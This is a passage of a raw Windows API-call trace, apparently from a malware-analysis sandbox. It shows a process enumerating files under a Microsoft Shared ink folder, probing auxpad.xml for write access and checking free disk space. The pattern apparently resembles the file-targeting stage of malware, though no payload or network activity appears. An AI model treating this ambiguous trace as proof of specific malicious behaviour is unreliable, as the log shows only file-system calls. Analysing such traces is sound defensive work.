lpFilePart=0x0) returned 0x38 [0045.122] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0045.122] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.122] CoTaskMemFree (pv=0x4fe370) [0045.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.122] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR", lpFilePart=0x0) returned 0x38 [0045.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0045.122] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR", lpFilePart=0x0) returned 0x38 [0045.122] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\", lpFilePart=0x0) returned 0x39 [0045.122] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.123] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.123] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8311729d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8311729d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8311729d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0045.123] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0045.123] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0045.123] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0045.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0045.124] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR", lpFilePart=0x0) returned 0x38 [0045.124] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\", lpFilePart=0x0) returned 0x39 [0045.124] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.124] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.124] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8311729d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8311729d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8311729d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0045.124] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8311729d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8311729d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8311729d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0045.124] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0045.124] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", lpFilePart=0x0) returned 0x40 [0045.124] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0045.124] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.125] CoTaskMemFree (pv=0x4fe370) [0045.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.125] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", lpFilePart=0x0) returned 0x40 [0045.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0045.125] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", lpFilePart=0x0) returned 0x40 [0045.125] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\", lpFilePart=0x0) returned 0x41 [0045.125] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.140] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.140] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxpad", cAlternateFileName="")) returned 1 [0045.140] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2b1a99, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2b1a99, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2b1a99, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0045.141] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="keypad", cAlternateFileName="")) returned 1 [0045.141] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f47ab01, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f47ab01, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f47ab01, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="keypad.xml", cAlternateFileName="")) returned 1 [0045.141] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="main", cAlternateFileName="")) returned 1 [0045.141] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f513079, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f513079, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f513079, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x9655, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.xml", cAlternateFileName="")) returned 1 [0045.141] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="numbers", cAlternateFileName="")) returned 1 [0045.141] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f79a7b7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f79a7b7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7c0915, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x0, dwReserved1=0x0, cFileName="numbers.xml", cAlternateFileName="")) returned 1 [0045.141] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenu", cAlternateFileName="")) returned 1 [0045.142] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f80cbd1, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f80cbd1, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f832d2f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0045.142] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpad", cAlternateFileName="OSKNUM~1")) returned 1 [0045.142] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdb3fc5, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdb3fc5, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdb3fc5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0045.142] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpred", cAlternateFileName="")) returned 1 [0045.142] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe00281, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe00281, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe00281, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0045.142] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbols", cAlternateFileName="")) returned 1 [0045.142] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe7269b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe7269b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe7269b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0045.142] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="web", cAlternateFileName="")) returned 1 [0045.143] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90061861, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x90061861, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x0, dwReserved1=0x0, cFileName="web.xml", cAlternateFileName="")) returned 1 [0045.143] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0045.143] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0045.144] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.144] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.144] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0045.144] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0045.197] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0045.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.199] GetFileType (hFile=0x264) returned 0x1 [0045.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0045.199] GetFileType (hFile=0x264) returned 0x1 [0045.199] CloseHandle (hObject=0x264) returned 1 [0045.199] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.199] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.199] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0045.200] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0045.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.200] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), fInfoLevelId=0x0, lpFileInformation=0x2298968 | out: lpFileInformation=0x2298968*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2b1a99, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2b1a99, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2b1a99, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd4)) returned 1 [0045.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.200] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpFilePart=0x0) returned 0x4b [0045.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.200] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), fInfoLevelId=0x0, lpFileInformation=0x2298c90 | out: lpFileInformation=0x2298c90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2b1a99, 